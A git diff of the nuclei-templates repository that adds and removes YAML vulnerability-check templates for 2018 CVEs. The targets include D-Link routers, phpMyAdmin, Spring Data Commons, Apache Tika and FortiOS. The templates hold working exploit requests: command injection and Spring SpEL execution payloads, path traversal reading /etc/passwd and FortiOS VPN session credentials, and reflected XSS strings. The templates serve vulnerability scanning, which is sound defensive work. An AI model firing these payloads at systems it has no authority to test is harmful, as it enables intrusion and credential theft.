@@ -1,39 +0,0 @@ -id: CVE-2018-10823 - -info: - name: D-Link Routers - Remote Command Injection - author: wisnupramoedya - severity: high - description: | - D-Link DWR-116 through 1.06, DWR-512 through 2.02, DWR-712 through 2.02, DWR-912 through 2.02, DWR-921 through 2.02, and DWR-111 through 1.01 device may allow an authenticated attacker to execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. This allows for full control over the device internals. - reference: - - https://www.exploit-db.com/exploits/45676 - - https://nvd.nist.gov/vuln/detail/CVE-2018-10823 - - https://seclists.org/fulldisclosure/2018/Oct/36 - - http://sploit.tech/2018/10/12/D-Link.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2018-10823 - cwe-id: CWE-78 - tags: cve2018,rce,iot,dlink,router,edb,seclists,cve - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/19 diff --git a/nuclei-templates/CVE-2018/CVE-2018-11409.yaml b/nuclei-templates/CVE-2018/CVE-2018-11409.yaml new file mode 100644 index 0000000000..8585e49182 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-11409.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-11409 + +info: + name: Splunk <=7.0.1 - Information Disclosure + author: harshbothra_ + severity: medium + description: Splunk through 7.0.1 is susceptible to information disclosure by appending __raw/services/server/info/server-info?output_mode=json to a query, as demonstrated by discovering a license key. + reference: + - https://github.com/kofa2002/splunk + - https://www.exploit-db.com/exploits/44865/ + - http://web.archive.org/web/20211208114213/https://securitytracker.com/id/1041148 + - https://nvd.nist.gov/vuln/detail/CVE-2018-11409 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2018-11409 + cwe-id: CWE-200 + tags: edb,cve,cve2018,splunk + metadata: + max-request: 2 + +http: + - method: GET + path: + - '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json' + - '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json' + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - licenseKeys + +# Enhanced by md on 2023/01/30 diff --git a/nuclei-templates/CVE-2018/CVE-2018-12031.yaml b/nuclei-templates/CVE-2018/CVE-2018-12031.yaml deleted file mode 100644 index 4e98b1fb1d..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-12031.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-12031 - -info: - name: Eaton Intelligent Power Manager 1.6 - Directory Traversal - author: daffainfo - severity: critical - description: Eaton Intelligent Power Manager v1.6 allows an attacker to include a file via directory traversal, which can lead to sensitive information disclosure, denial of service and code execution. - reference: - - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - - https://www.exploit-db.com/exploits/48614 - - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-12031 - cwe-id: CWE-22 - tags: cve,cve2018,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-12054.yaml b/nuclei-templates/CVE-2018/CVE-2018-12054.yaml new file mode 100644 index 0000000000..99e0202257 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-12054.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-12054 + +info: + name: Schools Alert Management Script - Arbitrary File Read + author: wisnupramoedya + severity: high + description: Schools Alert Management Script is susceptible to an arbitrary file read vulnerability via the f parameter in img.php, aka absolute path traversal. + reference: + - https://www.exploit-db.com/exploits/44874 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12054 + - https://github.com/unh3x/just4cve/issues/4 + - https://www.exploit-db.com/exploits/44874/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-12054 + cwe-id: CWE-22 + tags: cve,cve2018,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/img.php?f=/./etc/./passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2018/CVE-2018-12095.yaml b/nuclei-templates/CVE-2018/CVE-2018-12095.yaml new file mode 100644 index 0000000000..cd09108f78 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-12095.yaml @@ -0,0 +1,38 @@ +id: CVE-2018-12095 + +info: + name: OEcms 3.1 - Cross-Site Scripting + author: LogicalHunter + severity: medium + description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php. + reference: + - https://www.exploit-db.com/exploits/44895 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095 + - https://cxsecurity.com/issue/WLB-2018060092 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2018-12095 + cwe-id: CWE-79 + tags: cve,cve2018,xss + +requests: + - method: GET + path: + - '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-12296.yaml b/nuclei-templates/CVE-2018/CVE-2018-12296.yaml deleted file mode 100644 index 8e671af933..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-12296.yaml +++ /dev/null @@ -1,49 +0,0 @@ -id: CVE-2018-12296 - -info: - name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure - author: princechaddha - severity: high - description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos. - remediation: | - Upgrade to a patched version of Seagate NAS OS. - reference: - - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://nvd.nist.gov/vuln/detail/CVE-2018-12296 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-12296 - cwe-id: CWE-732 - epss-score: 0.01545 - epss-percentile: 0.85675 - cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: seagate - product: nas_os - tags: cve,cve2018,seagate,nasos,disclosure,unauth - -http: - - raw: - - | - POST /api/external/7.0/system.System.get_infos HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}} - - matchers: - - type: word - part: body - words: - - '"version":' - - '"serial_number":' - condition: and - - extractors: - - type: regex - group: 1 - regex: - - '"version": "([0-9.]+)"' - part: body - -# digest: 490a00463044022047b0cb4bc8f43872d1a4b51ddd0e241d6890ea3178d02488aac70fcd0be5b3df022004ca155952310187452b6056f780f0f6e0ef89de72cdb522a4618e330a5d77e9:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/CVE-2018/CVE-2018-12300.yaml b/nuclei-templates/CVE-2018/CVE-2018-12300.yaml deleted file mode 100644 index 30c92b3154..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-12300.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2018-12300 - -info: - name: Seagate NAS OS 4.3.15.1 - Open redirect - author: 0x_Akoko - severity: medium - description: Arbitrary Redirect in echo-server.html in Seagate NAS OS version 4.3.15.1 allows attackers to disclose information in the Referer header via the 'state' URL parameter. - reference: - - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170 - - https://www.cvedetails.com/cve/CVE-2018-12300 - tags: cve,cve2018,redirect,seagate,nasos - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-12300 - cwe-id: CWE-601 - -requests: - - method: GET - - path: - - '{{BaseURL}}/echo-server.html?code=test&state=http://www.example.com#' - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' - part: header diff --git a/nuclei-templates/CVE-2018/CVE-2018-1247.yaml b/nuclei-templates/CVE-2018/CVE-2018-1247.yaml deleted file mode 100644 index 4d0cf1ab7e..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1247.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: CVE-2018-1247 - -info: - name: RSA Authentication Manager XSS - author: madrobot - severity: medium - tags: cve,cve2018,xss,flash - -requests: - - method: GET - path: - - "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//" - - matchers-condition: and - matchers: - - type: word - words: - - "application/x-shockwave-flash" - part: header - - type: word - words: - - "javascript:alert(1337)" - part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml b/nuclei-templates/CVE-2018/CVE-2018-12613.yaml deleted file mode 100644 index e069d71059..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-12613.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: CVE-2018-12613 - -info: - name: PhpMyAdmin <4.8.2 - Local File Inclusion - author: pikpikcu - severity: high - description: PhpMyAdmin before version 4.8.2 is susceptible to local file inclusion that allows an attacker to include (view and potentially execute) files on the server. The vulnerability comes from a portion of code where pages are redirected and loaded within phpMyAdmin, and an improper test for whitelisted pages. An attacker must be authenticated, except in the "$cfg['AllowArbitraryServer'] = true" case (where an attacker can specify any host he/she is already in control of, and execute arbitrary code on phpMyAdmin) and the "$cfg['ServerDefault'] = 0" case (which bypasses the login requirement and runs the vulnerable code without any authentication). - reference: - - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613 - - https://www.phpmyadmin.net/security/PMASA-2018-4/ - - https://www.exploit-db.com/exploits/44928/ - - http://web.archive.org/web/20210124181726/https://www.securityfocus.com/bid/104532/ - - https://nvd.nist.gov/vuln/detail/CVE-2018-12613 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2018-12613 - cwe-id: CWE-287 - cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* - epss-score: 0.97516 - tags: vulhub,edb,cve,cve2018,phpmyadmin,lfi - metadata: - max-request: 1 - -http: - - method: GET - path: - - '{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd' - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - part: body - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/06 diff --git a/nuclei-templates/CVE-2018/CVE-2018-1273.yaml b/nuclei-templates/CVE-2018/CVE-2018-1273.yaml deleted file mode 100644 index 1982b42721..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-1273.yaml +++ /dev/null @@ -1,50 +0,0 @@ -id: CVE-2018-1273 - -info: - name: Spring Data Commons - Remote Code Execution - author: dwisiswant0 - severity: critical - description: | - Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5, - and older unsupported versions, contain a property binder vulnerability - caused by improper neutralization of special elements. - An unauthenticated remote malicious user (or attacker) can supply - specially crafted request parameters against Spring Data REST backed HTTP resources - or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-1273 - - https://pivotal.io/security/cve-2018-1273 - - http://mail-archives.apache.org/mod_mbox/ignite-dev/201807.mbox/%3CCAK0qHnqzfzmCDFFi6c5Jok19zNkVCz5Xb4sU%3D0f2J_1i4p46zQ%40mail.gmail.com%3E - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-1273 - cwe-id: CWE-20 - tags: cve,cve2018,vmware,rce,spring,kev - metadata: - max-request: 2 - -http: - - raw: - - | - POST /account HTTP/1.1 - Host: {{Hostname}} - Connection: close - Content-Type: application/x-www-form-urlencoded - - name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode('{{command}}')}}')]=nuclei - - payloads: - command: - - "cat /etc/passwd" - - "type C:\\/Windows\\/win.ini" - - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - "\\[(font|extension|file)s\\]" - condition: or - part: body - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-12998.yaml b/nuclei-templates/CVE-2018/CVE-2018-12998.yaml new file mode 100644 index 0000000000..59dc289d29 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-12998.yaml @@ -0,0 +1,39 @@ +id: CVE-2018-12998 + +info: + name: Zoho manageengine Arbitrary Reflected XSS + author: pikpikcu + severity: medium + description: A reflected Cross-site scripting (XSS) vulnerability in Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 allows remote attackers to inject arbitrary web script or HTML via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet. + reference: + - https://github.com/unh3x/just4cve/issues/10 + - http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html + - https://nvd.nist.gov/vuln/detail/CVE-2018-12998 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2018-12998 + cwe-id: CWE-79 + tags: cve,cve2018,zoho,xss,manageengine + +requests: + - method: GET + path: + - "{{BaseURL}}/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2018/CVE-2018-1335.yaml b/nuclei-templates/CVE-2018/CVE-2018-1335.yaml new file mode 100644 index 0000000000..1805b0a5ec --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-1335.yaml @@ -0,0 +1,48 @@ +id: CVE-2018-1335 + +info: + name: Apache Tika 1.15-1.17 Header Command Injection + author: pikpikcu + severity: high + description: From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18. + reference: + - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ + - https://www.exploit-db.com/exploits/47208 + - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E + - http://www.securityfocus.com/bid/104001 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2018-1335 + tags: cve,cve2018,apache,tika,rce + +requests: + - method: PUT + path: + - "{{BaseURL}}/meta" + headers: + X-Tika-OCRTesseractPath: cscript + X-Tika-OCRLanguage: //E:Jscript + Expect: 100-continue + Content-type: image/jp2 + Connection: close + body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");" + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: text/csv" + part: header + + - type: word + words: + - "org.apache.tika.parser.DefaultParser" + - "org.apache.tika.parser.gdal.GDALParse" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-13379.yaml b/nuclei-templates/CVE-2018/CVE-2018-13379.yaml new file mode 100644 index 0000000000..3ad6d6e608 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-13379.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-13379 + +info: + name: Fortinet FortiOS - Credentials Disclosure + author: organiccrap + severity: critical + description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal). + reference: + - https://fortiguard.com/advisory/FG-IR-18-384 + - https://www.fortiguard.com/psirt/FG-IR-20-233 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-13379 + cwe-id: CWE-22 + tags: cve,cve2018,fortios + +requests: + - method: GET + path: + - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" + matchers: + - type: word + words: + - "var fgt_lang" + +# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-13380.yaml b/nuclei-templates/CVE-2018/CVE-2018-13380.yaml new file mode 100644 index 0000000000..c76b518800 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-13380.yaml @@ -0,0 +1,31 @@ +id: CVE-2018-13380 + +info: + name: Fortinet FortiOS Cross-Site Scripting + author: shelld3v + severity: medium + description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters. + type: XSS + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380 + +requests: + - method: GET + path: + - "{{BaseURL}}/message?title=x&msg=%26%23" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + words: + - "application/json" + part: header + negative: true + + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-13880.yaml b/nuclei-templates/CVE-2018/CVE-2018-13880.yaml deleted file mode 100644 index 817ec01641..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-13880.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2018-13380 - -info: - name: Fortinet FortiOS Cross-Site Scripting - author: shelld3v - severity: medium - description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters. - reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380 - - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2018-13380 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E" - - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - words: - - "application/json" - part: header - negative: true - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml b/nuclei-templates/CVE-2018/CVE-2018-13980.yaml deleted file mode 100644 index fd9ee56799..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-13980 - -info: - name: Zeta Producer Desktop CMS 14.2.0 - Arbitrary File Retrieval - author: wisnupramoedya - severity: medium - description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. - reference: - - https://www.exploit-db.com/exploits/45016 - - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 - - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/ - - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2018-13980 - cwe-id: CWE-22 - tags: cve,cve2018,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-14574.yaml b/nuclei-templates/CVE-2018/CVE-2018-14574.yaml deleted file mode 100644 index dd98158430..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-14574.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2018-14574 - -info: - name: Django - Open Redirect - author: pikpikcu - severity: medium - description: Django 1.11.x before 1.11.15 and 2.0.x before 2.0.8 contains an open redirect vulnerability. If django.middleware.common.CommonMiddleware and APPEND_SLASH settings are selected, and if the project has a URL pattern that accepts any path ending in a slash, an attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - reference: - - https://www.djangoproject.com/weblog/2018/aug/01/security-releases/ - - https://usn.ubuntu.com/3726-1/ - - http://web.archive.org/web/20211206044224/https://securitytracker.com/id/1041403 - - https://www.debian.org/security/2018/dsa-4264 - - http://web.archive.org/web/20210124194607/https://www.securityfocus.com/bid/104970/ - - https://access.redhat.com/errata/RHSA-2019:0265 - - https://nvd.nist.gov/vuln/detail/CVE-2018-14574 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2018-14574 - cwe-id: CWE-601 - tags: cve,cve2018,django,redirect - metadata: - max-request: 1 - -http: - - method: GET - path: - - "{{BaseURL}}//www.interact.sh" - - matchers-condition: and - matchers: - - type: status - status: - - 301 - - type: word - words: - - "Location: https://www.interact.sh" - - "Location: http://www.interact.sh" - part: header - -# Enhanced by md on 2022/10/13 diff --git a/nuclei-templates/CVE-2018/CVE-2018-14912.yaml b/nuclei-templates/CVE-2018/CVE-2018-14912.yaml deleted file mode 100644 index ccb43cade4..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-14912.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-14912 - -info: - name: cgit < 1.2.1 Directory Traversal - author: 0x_Akoko - severity: high - description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request. - reference: - - https://cxsecurity.com/issue/WLB-2018080034 - - https://nvd.nist.gov/vuln/detail/CVE-2018-14912 - - https://lists.zx2c4.com/pipermail/cgit/2018-August/004176.html - - https://bugs.chromium.org/p/project-zero/issues/detail?id=1627 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-14912 - cwe-id: CWE-22 - tags: cve,cve2018,cgit,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/cgit/cgit.cgi/git/objects/?path=../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/18 diff --git a/nuclei-templates/CVE-2018/CVE-2018-14916.yaml b/nuclei-templates/CVE-2018/CVE-2018-14916.yaml deleted file mode 100644 index 751421b50f..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-14916.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-14916 -info: - name: Loytec LGATE-902 Directory Traversal - author: 0x_Akoko - severity: critical - description: Loytec LGATE-902 versions prior to 6.4.2 suffer from cross site scripting, arbitrary file deletion, and directory traversal vulnerabilities. - reference: - - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - - https://www.cvedetails.com/cve/CVE-2018-14916 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.4 - cve-id: CVE-2018-14916 - cwe-id: CWE-732 - tags: cve,cve2018,loytec,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-15138.yaml b/nuclei-templates/CVE-2018/CVE-2018-15138.yaml new file mode 100644 index 0000000000..cca957188f --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-15138.yaml @@ -0,0 +1,34 @@ +id: CVE-2018-15138 + +info: + name: LG-Ericsson iPECS NMS 30M Directory Traversal + author: 0x_Akoko + severity: high + description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs. + reference: + - https://cxsecurity.com/issue/WLB-2018080070 + - https://nvd.nist.gov/vuln/detail/CVE-2018-15138 + - https://www.exploit-db.com/exploits/45167/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-15138 + cwe-id: CWE-22 + tags: cve,cve2018,ericsson,lfi,traversal + +requests: + - method: GET + path: + - "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data" + - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-15473.yaml b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml new file mode 100644 index 0000000000..2392e8714b --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-15473 +info: + name: OpenSSH Username Enumeration <= v7.7 + author: r3dg33k,daffainfo,forgedhallpass + severity: medium + description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 + - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 + - https://bugs.debian.org/906236 + - http://www.openwall.com/lists/oss-security/2018/08/15/5 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2018-15473 + cwe-id: CWE-362 + tags: network,openssh,cve,cve2018 +network: + - host: + - "{{Hostname}}" + - "{{Host}}:22" + matchers: + - type: regex + regex: + - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' + extractors: + - type: regex + regex: + - '(?i)SSH-2.0-OpenSSH_[^\r]+' diff --git a/nuclei-templates/CVE-2018/CVE-2018-15517.yaml b/nuclei-templates/CVE-2018/CVE-2018-15517.yaml deleted file mode 100644 index 1c00fd5e65..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-15517.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2018-15517 - -info: - name: D-Link Central WifiManager - Server-Side Request Forgery - author: gy741 - severity: high - description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. - reference: - - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517 - - http://seclists.org/fulldisclosure/2018/Nov/28 - - 